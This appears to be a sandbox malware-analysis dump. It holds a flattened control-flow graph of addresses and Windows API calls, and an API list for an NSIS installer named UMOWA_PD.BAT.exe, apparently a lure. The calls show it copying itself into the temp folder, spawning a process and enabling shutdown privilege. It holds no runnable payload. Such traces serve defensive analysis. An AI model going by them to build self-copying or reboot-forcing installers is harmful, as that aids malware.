5688 402d89 21 API calls 5687->5688 5688->5689 4453 402304 4454 402dab 21 API calls 4453->4454 4455 40230a 4454->4455 4456 402dab 21 API calls 4455->4456 4457 402313 4456->4457 4458 402dab 21 API calls 4457->4458 4459 40231c 4458->4459 4468 40687e FindFirstFileW 4459->4468 4462 402336 lstrlenW lstrlenW 4463 4055a6 28 API calls 4462->4463 4465 402374 SHFileOperationW 4463->4465 4466 402329 4465->4466 4467 402331 4465->4467 4466->4467 4471 4055a6 4466->4471 4469 406894 FindClose 4468->4469 4470 402325 4468->4470 4469->4470 4470->4462 4470->4466 4472 4055c1 4471->4472 4480 405663 4471->4480 4473 4055dd lstrlenW 4472->4473 4474 40655e 21 API calls 4472->4474 4475 405606 4473->4475 4476 4055eb lstrlenW 4473->4476 4474->4473 4478 405619 4475->4478 4479 40560c SetWindowTextW 4475->4479 4477 4055fd lstrcatW 4476->4477 4476->4480 4477->4475 4478->4480 4481 40561f SendMessageW SendMessageW SendMessageW 4478->4481 4479->4478 4480->4467 4481->4480 5690 401a04 5691 402dab 21 API calls 5690->5691 5692 401a0b 5691->5692 5693 402dab 21 API calls 5692->5693 5694 401a14 5693->5694 5695 401a1b lstrcmpiW 5694->5695 5696 401a2d lstrcmpW 5694->5696 5697 401a21 5695->5697 5696->5697 5698 401d86 5699 401d99 GetDlgItem 5698->5699 5700 401d8c 5698->5700 5702 401d93 5699->5702 5701 402d89 21 API calls 5700->5701 5701->5702 5703 401dda GetClientRect LoadImageW SendMessageW 5702->5703 5704 402dab 21 API calls 5702->5704 5706 401e38 5703->5706 5708 401e44 5703->5708 5704->5703 5707 401e3d DeleteObject 5706->5707 5706->5708 5707->5708 5709 402388 5710 40238f 5709->5710 5713 4023a2 5709->5713 5711 40655e 21 API calls 5710->5711 5712 40239c 5711->5712 5712->5713 5714 405b81 MessageBoxIndirectW 5712->5714 5714->5713 5715 402c0a SendMessageW 5716 402c24 InvalidateRect 5715->5716 5717 402c2f 5715->5717 5716->5717 5725 404f0d GetDlgItem GetDlgItem 5726 405184 5725->5726 5727 404f5f 7 API calls 5725->5727 5731 405266 5726->5731 5757 4051f3 5726->5757 5779 404e5b SendMessageW 5726->5779 5728 405006 
DeleteObject 5727->5728 5729 404ff9 SendMessageW 5727->5729 5730 40500f 5728->5730 5729->5728 5732 405046 5730->5732 5734 40655e 21 API calls 5730->5734 5733 405312 5731->5733 5737 405177 5731->5737 5742 4052bf SendMessageW 5731->5742 5735 4044a0 22 API calls 5732->5735 5738 405324 5733->5738 5739 40531c SendMessageW 5733->5739 5740 405028 SendMessageW SendMessageW 5734->5740 5736 40505a 5735->5736 5741 4044a0 22 API calls 5736->5741 5744 404507 8 API calls 5737->5744 5749 405336 ImageList_Destroy 5738->5749 5750 40533d 5738->5750 5754 40534d 5738->5754 5739->5738 5740->5730 5758 40506b 5741->5758 5742->5737 5747 4052d4 SendMessageW 5742->5747 5743 405258 SendMessageW 5743->5731 5748 405513 5744->5748 5746 4054c7 5746->5737 5755 4054d9 ShowWindow GetDlgItem ShowWindow 5746->5755 5753 4052e7 5747->5753 5749->5750 5751 405346 GlobalFree 5750->5751 5750->5754 5751->5754 5752 405146 GetWindowLongW SetWindowLongW 5756 40515f 5752->5756 5763 4052f8 SendMessageW 5753->5763 5754->5746 5772 405388 5754->5772 5784 404edb 5754->5784 5755->5737 5759 405164 ShowWindow 5756->5759 5760 40517c 5756->5760 5757->5731 5757->5743 5758->5752 5762 4050be SendMessageW 5758->5762 5764 405141 5758->5764 5766 405110 SendMessageW 5758->5766 5767 4050fc SendMessageW 5758->5767 5777 4044d5 SendMessageW 5759->5777 5778 4044d5 SendMessageW 5760->5778 5762->5758 5763->5733 5764->5752 5764->5756 5766->5758 5767->5758 5769 405492 5770 40549d InvalidateRect 5769->5770 5773 4054a9 5769->5773 5770->5773 5771 4053b6 SendMessageW 5776 4053cc 5771->5776 5772->5771 5772->5776 5773->5746 5793 404e16 5773->5793 5775 405440 SendMessageW SendMessageW 5775->5776 5776->5769 5776->5775 5777->5737 5778->5726 5780 404eba SendMessageW 5779->5780 5781 404e7e GetMessagePos ScreenToClient SendMessageW 5779->5781 5782 404eb2 5780->5782 5781->5782 5783 404eb7 5781->5783 5782->5757 5783->5780 5796 406521 lstrcpynW 5784->5796 5786 404eee 5797 406468 wsprintfW 5786->5797 5788 404ef8 5789 40140b 2 API calls 5788->5789 5790 
404f01 5789->5790 5798 406521 lstrcpynW 5790->5798 5792 404f08 5792->5772 5799 404d4d 5793->5799 5795 404e2b 5795->5746 5796->5786 5797->5788 5798->5792 5801 404d66 5799->5801 5800 40655e 21 API calls 5802 404dca 5800->5802 5801->5800 5803 40655e 21 API calls 5802->5803 5804 404dd5 5803->5804 5805 40655e 21 API calls 5804->5805 5806 404deb lstrlenW wsprintfW SetDlgItemTextW 5805->5806 5806->5795 5807 40248f 5808 402dab 21 API calls 5807->5808 5809 4024a1 5808->5809 5810 402dab 21 API calls 5809->5810 5811 4024ab 5810->5811 5824 402e3b 5811->5824 5814 402c2f 5815 4024e3 5817 402d89 21 API calls 5815->5817 5819 4024ef 5815->5819 5816 402dab 21 API calls 5820 4024d9 lstrlenW 5816->5820 5817->5819 5818 40250e RegSetValueExW 5822 402524 RegCloseKey 5818->5822 5819->5818 5821 4032b9 39 API calls 5819->5821 5820->5815 5821->5818 5822->5814 5825 402e56 5824->5825 5828 4063bc 5825->5828 5829 4063cb 5828->5829 5830 4024bb 5829->5830 5831 4063d6 RegCreateKeyExW 5829->5831 5830->5814 5830->5815 5830->5816 5831->5830 5832 404610 lstrlenW 5833 404631 WideCharToMultiByte 5832->5833 5834 40462f 5832->5834 5834->5833 5835 402910 5836 402dab 21 API calls 5835->5836 5837 402917 FindFirstFileW 5836->5837 5838 40293f 5837->5838 5842 40292a 5837->5842 5839 402948 5838->5839 5843 406468 wsprintfW 5838->5843 5844 406521 lstrcpynW 5839->5844 5843->5839 5844->5842 5845 401911 5846 401948 5845->5846 5847 402dab 21 API calls 5846->5847 5848 40194d 5847->5848 5849 405c2d 71 API calls 5848->5849 5850 401956 5849->5850 5851 401491 5852 4055a6 28 API calls 5851->5852 5853 401498 5852->5853 5854 404991 5855 4049bd 5854->5855 5856 4049ce 5854->5856 5915 405b65 GetDlgItemTextW 5855->5915 5858 4049da GetDlgItem 5856->5858 5859 404a39 5856->5859 5862 4049ee 5858->5862 5860 404b1d 5859->5860 5867 40655e 21 API calls 5859->5867 5913 404ccc 5859->5913 5860->5913 5917 405b65 GetDlgItemTextW 5860->5917 5861 4049c8 5863 4067cf 5 API calls 5861->5863 5865 404a02 SetWindowTextW 5862->5865 5866 405e9b 4 API 
calls 5862->5866 5863->5856 5869 4044a0 22 API calls 5865->5869 5871 4049f8 5866->5871 5872 404aad SHBrowseForFolderW 5867->5872 5868 404b4d 5873 405ef8 18 API calls 5868->5873 5874 404a1e 5869->5874 5870 404507 8 API calls 5875 404ce0 5870->5875 5871->5865 5878 405df0 3 API calls 5871->5878 5872->5860 5876 404ac5 CoTaskMemFree 5872->5876 5880 404b53 5873->5880 5877 4044a0 22 API calls 5874->5877 5879 405df0 3 API calls 5876->5879 5881 404a2c 5877->5881 5878->5865 5882 404ad2 5879->5882 5918 406521 lstrcpynW 5880->5918 5916 4044d5 SendMessageW 5881->5916 5885 404b09 SetDlgItemTextW 5882->5885 5890 40655e 21 API calls 5882->5890 5885->5860 5886 404a32 5888 406915 5 API calls 5886->5888 5887 404b6a 5889 406915 5 API calls 5887->5889 5888->5859 5896 404b71 5889->5896 5891 404af1 lstrcmpiW 5890->5891 5891->5885 5894 404b02 lstrcatW 5891->5894 5892 404bb2 5919 406521 lstrcpynW 5892->5919 5894->5885 5895 404bb9 5897 405e9b 4 API calls 5895->5897 5896->5892 5900 405e3c 2 API calls 5896->5900 5902 404c0a 5896->5902 5898 404bbf GetDiskFreeSpaceW 5897->5898 5901 404be3 MulDiv 5898->5901 5898->5902 5900->5896 5901->5902 5903 404c7b 5902->5903 5905 404e16 24 API calls 5902->5905 5904 404c9e 5903->5904 5906 40140b 2 API calls 5903->5906 5920 4044c2 KiUserCallbackDispatcher 5904->5920 5907 404c68 5905->5907 5906->5904 5909 404c7d SetDlgItemTextW 5907->5909 5910 404c6d 5907->5910 5909->5903 5912 404d4d 24 API calls 5910->5912 5911 404cba 5911->5913 5914 4048ea SendMessageW 5911->5914 5912->5903 5913->5870 5914->5913 5915->5861 5916->5886 5917->5868 5918->5887 5919->5895 5920->5911 5921 401914 5922 402dab 21 API calls 5921->5922 5923 40191b 5922->5923 5924 405b81 MessageBoxIndirectW 5923->5924 5925 401924 5924->5925 4812 402896 4813 40289d 4812->4813 4819 402bae 4812->4819 4814 402d89 21 API calls 4813->4814 4815 4028a4 4814->4815 4816 4028b3 SetFilePointer 4815->4816 4817 4028c3 4816->4817 4816->4819 4820 406468 wsprintfW 4817->4820 4820->4819 5926 401f17 5927 402dab 21 API calls 
5926->5927 5928 401f1d 5927->5928 5929 402dab 21 API calls 5928->5929 5930 401f26 5929->5930 5931 402dab 21 API calls 5930->5931 5932 401f2f 5931->5932 5933 402dab 21 API calls 5932->5933 5934 401f38 5933->5934 5935 401423 28 API calls 5934->5935 5936 401f3f 5935->5936 5943 405b47 ShellExecuteExW 5936->5943 5938 401f87 5940 402933 5938->5940 5944 4069c0 WaitForSingleObject 5938->5944 5941 401fa4 CloseHandle 5941->5940 5943->5938 5945 4069da 5944->5945 5946 4069ec GetExitCodeProcess 5945->5946 5947 406951 2 API calls 5945->5947 5946->5941 5948 4069e1 WaitForSingleObject 5947->5948 5948->5945 5949 402f98 5950 402fc3 5949->5950 5951 402faa SetTimer 5949->5951 5952 403018 5950->5952 5953 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5950->5953 5951->5950 5953->5952 5954 40551a 5955 40552a 5954->5955 5956 40553e 5954->5956 5957 405530 5955->5957 5966 405587 5955->5966 5958 405546 IsWindowVisible 5956->5958 5964 40555d 5956->5964 5960 4044ec SendMessageW 5957->5960 5961 405553 5958->5961 5958->5966 5959 40558c CallWindowProcW 5962 40553a 5959->5962 5960->5962 5963 404e5b 5 API calls 5961->5963 5963->5964 5964->5959 5965 404edb 4 API calls 5964->5965 5965->5966 5966->5959 5967 401d1c 5968 402d89 21 API calls 5967->5968 5969 401d22 IsWindow 5968->5969 5970 401a25 5969->5970 5971 40149e 5972 4023a2 5971->5972 5973 4014ac PostQuitMessage 5971->5973 5973->5972 5974 6fe2103d 5977 6fe2101b 5974->5977 5978 6fe215b6 GlobalFree 5977->5978 5979 6fe21020 5978->5979 5980 6fe21027 GlobalAlloc 5979->5980 5981 6fe21024 5979->5981 5980->5981 5982 6fe215dd 3 API calls 5981->5982 5983 6fe2103b 5982->5983 4222 401ba0 4223 401bf1 4222->4223 4228 401bad 4222->4228 4224 401c1b GlobalAlloc 4223->4224 4226 401bf6 4223->4226 4241 40655e 4224->4241 4225 401c36 4229 40655e 21 API calls 4225->4229 4235 4023a2 4225->4235 4226->4235 4260 406521 lstrcpynW 4226->4260 4228->4225 4231 401bc4 4228->4231 4232 40239c 4229->4232 4258 406521 lstrcpynW 4231->4258 4232->4235 4261 405b81 4232->4261 4233 
401c08 GlobalFree 4233->4235 4237 401bd3 4259 406521 lstrcpynW 4237->4259 4239 401be2 4265 406521 lstrcpynW 4239->4265 4245 406569 4241->4245 4242 4067b0 4243 4067c9 4242->4243 4288 406521 lstrcpynW 4242->4288 4243->4225 4245->4242 4246 406781 lstrlenW 4245->4246 4247 40655e 15 API calls 4245->4247 4251 40667a GetSystemDirectoryW 4245->4251 4252 406690 GetWindowsDirectoryW 4245->4252 4253 406722 lstrcatW 4245->4253 4255 40655e 15 API calls 4245->4255 4257 4066f2 SHGetPathFromIDListW CoTaskMemFree 4245->4257 4266 4063ef 4245->4266 4271 406915 GetModuleHandleA 4245->4271 4277 4067cf 4245->4277 4286 406468 wsprintfW 4245->4286 4287 406521 lstrcpynW 4245->4287 4246->4245 4247->4246 4251->4245 4252->4245 4253->4245 4255->4245 4257->4245 4258->4237 4259->4239 4260->4233 4262 405b96 4261->4262 4263 405be2 4262->4263 4264 405baa MessageBoxIndirectW 4262->4264 4263->4235 4264->4263 4265->4235 4289 40638e 4266->4289 4269 406423 RegQueryValueExW RegCloseKey 4270 406453 4269->4270 4270->4245 4272 406931 4271->4272 4273 40693b GetProcAddress 4271->4273 4293 4068a5 GetSystemDirectoryW 4272->4293 4275 40694a 4273->4275 4275->4245 4276 406937 4276->4273 4276->4275 4284 4067dc 4277->4284 4278 406852 4279 406857 CharPrevW 4278->4279 4281 406878 4278->4281 4279->4278 4280 406845 CharNextW 4280->4278 4280->4284 4281->4245 4283 406831 CharNextW 4283->4284 4284->4278 4284->4280 4284->4283 4285 406840 CharNextW 4284->4285 4296 405e1d 4284->4296 4285->4280 4286->4245 4287->4245 4288->4243 4290 40639d 4289->4290 4291 4063a1 4290->4291 4292 4063a6 RegOpenKeyExW 4290->4292 4291->4269 4291->4270 4292->4291 4294 4068c7 wsprintfW LoadLibraryExW 4293->4294 4294->4276 4297 405e23 4296->4297 4298 405e39 4297->4298 4299 405e2a CharNextW 4297->4299 4298->4284 4299->4297 4316 403fa1 4317 403fb9 4316->4317 4318 40411a 4316->4318 4317->4318 4319 403fc5 4317->4319 4320 40416b 4318->4320 4321 40412b GetDlgItem GetDlgItem 4318->4321 4322 403fd0 SetWindowPos 4319->4322 4323 403fe3 4319->4323 4325 4041c5 
4320->4325 4336 401389 2 API calls 4320->4336 4324 4044a0 22 API calls 4321->4324 4322->4323 4327 403fec ShowWindow 4323->4327 4328 40402e 4323->4328 4329 404155 SetClassLongW 4324->4329 4330 404115 4325->4330 4389 4044ec 4325->4389 4331 404107 4327->4331 4332 40400c GetWindowLongW 4327->4332 4333 404036 DestroyWindow 4328->4333 4334 40404d 4328->4334 4335 40140b 2 API calls 4329->4335 4411 404507 4331->4411 4332->4331 4338 404025 ShowWindow 4332->4338 4339 404429 4333->4339 4340 404052 SetWindowLongW 4334->4340 4341 404063 4334->4341 4335->4320 4342 40419d 4336->4342 4338->4328 4339->4330 4347 40445a ShowWindow 4339->4347 4340->4330 4341->4331 4346 40406f GetDlgItem 4341->4346 4342->4325 4343 4041a1 SendMessageW 4342->4343 4343->4330 4344 40140b 2 API calls 4359 4041d7 4344->4359 4345 40442b DestroyWindow EndDialog 4345->4339 4348 404080 SendMessageW IsWindowEnabled 4346->4348 4349 40409d 4346->4349 4347->4330 4348->4330 4348->4349 4351 4040aa 4349->4351 4352 4040f1 SendMessageW 4349->4352 4353 4040bd 4349->4353 4362 4040a2 4349->4362 4350 40655e 21 API calls 4350->4359 4351->4352 4351->4362 4352->4331 4356 4040c5 4353->4356 4357 4040da 4353->4357 4355 4044a0 22 API calls 4355->4359 4405 40140b 4356->4405 4361 40140b 2 API calls 4357->4361 4358 4040d8 4358->4331 4359->4330 4359->4344 4359->4345 4359->4350 4359->4355 4380 40436b DestroyWindow 4359->4380 4392 4044a0 4359->4392 4363 4040e1 4361->4363 4408 404479 4362->4408 4363->4331 4363->4362 4365 404252 GetDlgItem 4366 404267 4365->4366 4367 40426f ShowWindow KiUserCallbackDispatcher 4365->4367 4366->4367 4395 4044c2 KiUserCallbackDispatcher 4367->4395 4369 404299 EnableWindow 4374 4042ad 4369->4374 4370 4042b2 GetSystemMenu EnableMenuItem SendMessageW 4371 4042e2 SendMessageW 4370->4371 4370->4374 4371->4374 4374->4370 4396 4044d5 SendMessageW 4374->4396 4397 403f82 4374->4397 4400 406521 lstrcpynW 4374->4400 4376 404311 lstrlenW 4377 40655e 21 API calls 4376->4377 4378 404327 SetWindowTextW 4377->4378 4401 
401389 4378->4401 4380->4339 4381 404385 CreateDialogParamW 4380->4381 4381->4339 4382 4043b8 4381->4382 4383 4044a0 22 API calls 4382->4383 4384 4043c3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4383->4384 4385 401389 2 API calls 4384->4385 4386 404409 4385->4386 4386->4330 4387 404411 ShowWindow 4386->4387 4388 4044ec SendMessageW 4387->4388 4388->4339 4390 404504 4389->4390 4391 4044f5 SendMessageW 4389->4391 4390->4359 4391->4390 4393 40655e 21 API calls 4392->4393 4394 4044ab SetDlgItemTextW 4393->4394 4394->4365 4395->4369 4396->4374 4398 40655e 21 API calls 4397->4398 4399 403f90 SetWindowTextW 4398->4399 4399->4374 4400->4376 4403 401390 4401->4403 4402 4013fe 4402->4359 4403->4402 4404 4013cb MulDiv SendMessageW 4403->4404 4404->4403 4406 401389 2 API calls 4405->4406 4407 401420 4406->4407 4407->4362 4409 404480 4408->4409 4410 404486 SendMessageW 4408->4410 4409->4410 4410->4358 4412 4045ca 4411->4412 4413 40451f GetWindowLongW 4411->4413 4412->4330 4413->4412 4414 404534 4413->4414 4414->4412 4415 404561 GetSysColor 4414->4415 4416 404564 4414->4416 4415->4416 4417 404574 SetBkMode 4416->4417 4418 40456a SetTextColor 4416->4418 4419 404592 4417->4419 4420 40458c GetSysColor 4417->4420 4418->4417 4421 4045a3 4419->4421 4422 404599 SetBkColor 4419->4422 4420->4419 4421->4412 4423 4045b6 DeleteObject 4421->4423 4424 4045bd CreateBrushIndirect 4421->4424 4422->4421 4423->4424 4424->4412 5984 402621 5985 402dab 21 API calls 5984->5985 5986 402628 5985->5986 5989 406011 GetFileAttributesW CreateFileW 5986->5989 5988 402634 5989->5988 5990 6fe21000 5991 6fe2101b 5 API calls 5990->5991 5992 6fe21019 5991->5992 4436 4025a3 4448 402deb 4436->4448 4439 402d89 21 API calls 4440 4025b6 4439->4440 4441 4025c5 4440->4441 4446 402933 4440->4446 4442 4025d2 RegEnumKeyW 4441->4442 4443 4025de RegEnumValueW 4441->4443 4444 4025fa RegCloseKey 4442->4444 4443->4444 4445 4025f3 4443->4445 4444->4446 4445->4444 4449 402dab 21 API calls 4448->4449 4450 402e02 
4449->4450 4451 40638e RegOpenKeyExW 4450->4451 4452 4025ad 4451->4452 4452->4439 4698 4015a8 4699 402dab 21 API calls 4698->4699 4700 4015af SetFileAttributesW 4699->4700 4701 4015c1 4700->4701 6000 401fa9 6001 402dab 21 API calls 6000->6001 6002 401faf 6001->6002 6003 4055a6 28 API calls 6002->6003 6004 401fb9 6003->6004 6005 405b04 2 API calls 6004->6005 6006 401fbf 6005->6006 6007 402933 6006->6007 6008 4069c0 5 API calls 6006->6008 6011 401fe2 CloseHandle 6006->6011 6010 401fd4 6008->6010 6010->6011 6013 406468 wsprintfW 6010->6013 6011->6007 6013->6011 4702 40252f 4703 402deb 21 API calls 4702->4703 4704 402539 4703->4704 4705 402dab 21 API calls 4704->4705 4706 402542 4705->4706 4707 40254d RegQueryValueExW 4706->4707 4710 402933 4706->4710 4708 402573 RegCloseKey 4707->4708 4709 40256d 4707->4709 4708->4710 4709->4708 4713 406468 wsprintfW 4709->4713 4713->4708 6014 40202f 6015 402dab 21 API calls 6014->6015 6016 402036 6015->6016 6017 406915 5 API calls 6016->6017 6018 402045 6017->6018 6019 402061 GlobalAlloc 6018->6019 6020 4020d1 6018->6020 6019->6020 6021 402075 6019->6021 6022 406915 5 API calls 6021->6022 6023 40207c 6022->6023 6024 406915 5 API calls 6023->6024 6025 402086 6024->6025 6025->6020 6029 406468 wsprintfW 6025->6029 6027 4020bf 6030 406468 wsprintfW 6027->6030 6029->6027 6030->6020 6031 6fe2170d 6032 6fe215b6 GlobalFree 6031->6032 6034 6fe21725 6032->6034 6033 6fe2176b GlobalFree 6034->6033 6035 6fe21740 6034->6035 6036 6fe21757 VirtualFree 6034->6036 6035->6033 6036->6033 6037 4021af 6038 402dab 21 API calls 6037->6038 6039 4021b6 6038->6039 6040 402dab 21 API calls 6039->6040 6041 4021c0 6040->6041 6042 402dab 21 API calls 6041->6042 6043 4021ca 6042->6043 6044 402dab 21 API calls 6043->6044 6045 4021d4 6044->6045 6046 402dab 21 API calls 6045->6046 6047 4021de 6046->6047 6048 40221d CoCreateInstance 6047->6048 6049 402dab 21 API calls 6047->6049 6052 40223c 6048->6052 6049->6048 6050 401423 28 API calls 6051 4022fb 6050->6051 
6052->6050 6052->6051 6053 403bb1 6054 403bbc 6053->6054 6055 403bc3 GlobalAlloc 6054->6055 6056 403bc0 6054->6056 6055->6056 6057 407332 6060 406ac3 6057->6060 6058 406b44 GlobalFree 6059 406b4d GlobalAlloc 6058->6059 6059->6060 6061 40742e 6059->6061 6060->6058 6060->6059 6060->6060 6060->6061 6062 406bc4 GlobalAlloc 6060->6062 6063 406bbb GlobalFree 6060->6063 6062->6060 6062->6061 6063->6062 6064 401a35 6065 402dab 21 API calls 6064->6065 6066 401a3e ExpandEnvironmentStringsW 6065->6066 6067 401a52 6066->6067 6069 401a65 6066->6069 6068 401a57 lstrcmpW 6067->6068 6067->6069 6068->6069 6075 4023b7 6076 4023c5 6075->6076 6077 4023bf 6075->6077 6079 402dab 21 API calls 6076->6079 6081 4023d3 6076->6081 6078 402dab 21 API calls 6077->6078 6078->6076 6079->6081 6080 4023e1 6083 402dab 21 API calls 6080->6083 6081->6080 6082 402dab 21 API calls 6081->6082 6082->6080 6084 4023ea WritePrivateProfileStringW 6083->6084 6085 4014b8 6086 4014be 6085->6086 6087 401389 2 API calls 6086->6087 6088 4014c6 6087->6088 4826 402439 4827 402441 4826->4827 4828 40246c 4826->4828 4830 402deb 21 API calls 4827->4830 4829 402dab 21 API calls 4828->4829 4831 402473 4829->4831 4832 402448 4830->4832 4838 402e69 4831->4838 4834 402452 4832->4834 4836 402480 4832->4836 4835 402dab 21 API calls 4834->4835 4837 402459 RegDeleteValueW RegCloseKey 4835->4837 4837->4836 4839 402e76 4838->4839 4840 402e7d 4838->4840 4839->4836 4840->4839 4842 402eae 4840->4842 4843 40638e RegOpenKeyExW 4842->4843 4844 402edc 4843->4844 4845 402f91 4844->4845 4846 402ee6 4844->4846 4845->4839 4847 402eec RegEnumValueW 4846->4847 4851 402f0f 4846->4851 4848 402f76 RegCloseKey 4847->4848 4847->4851 4848->4845 4849 402f4b RegEnumKeyW 4850 402f54 RegCloseKey 4849->4850 4849->4851 4852 406915 5 API calls 4850->4852 4851->4848 4851->4849 4851->4850 4853 402eae 6 API calls 4851->4853 4854 402f64 4852->4854 4853->4851 4855 402f86 4854->4855 4856 402f68 RegDeleteKeyW 4854->4856 4855->4845 4856->4845 4857 40173a 4858 
402dab 21 API calls 4857->4858 4859 401741 SearchPathW 4858->4859 4860 40175c 4859->4860 6089 401d3d 6090 402d89 21 API calls 6089->6090 6091 401d44 6090->6091 6092 402d89 21 API calls 6091->6092 6093 401d50 GetDlgItem 6092->6093 6094 40263d 6093->6094 6095 406c3f 6099 406ac3 6095->6099 6096 40742e 6097 406b44 GlobalFree 6098 406b4d GlobalAlloc 6097->6098 6098->6096 6098->6099 6099->6096 6099->6097 6099->6098 6100 406bc4 GlobalAlloc 6099->6100 6101 406bbb GlobalFree 6099->6101 6100->6096 6100->6099 6101->6100

Control-flow Graph

[Control-flow graph of the function beginning at 4034fc; legend: Executed / Not Executed]
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE ref: 0040351F
                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
                                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
                                                                                    • OleInitialize.OLE32(00000000), ref: 0040363A
                                                                                    • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
                                                                                    • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
                                                                                    • CharNextW.USER32(00000000,00434000,00000020,00434000,00000000,?,00000008,0000000A,0000000C), ref: 004036A7
                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FC
                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403818
                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
                                                                                    • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00434000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
                                                                                      • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                    • wsprintfW.USER32 ref: 0040397B
                                                                                    • GetFileAttributesW.KERNEL32(916,C:\Users\user\AppData\Local\Temp\), ref: 004039AE
                                                                                    • DeleteFileW.KERNEL32(916), ref: 004039BA
                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                                                                      • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB
                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\UMOWA_PD.BAT.exe,916,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
                                                                                      • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,916,?), ref: 00405B2D
                                                                                      • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,916,?), ref: 00405B3A
                                                                                      • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(?,00425F58,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                      • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
                                                                                    • ExitProcess.KERNEL32 ref: 00403A69
                                                                                    • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,916,00000000), ref: 00403A70
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                                                    • ExitProcess.KERNEL32 ref: 00403B13
                                                                                      • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmp
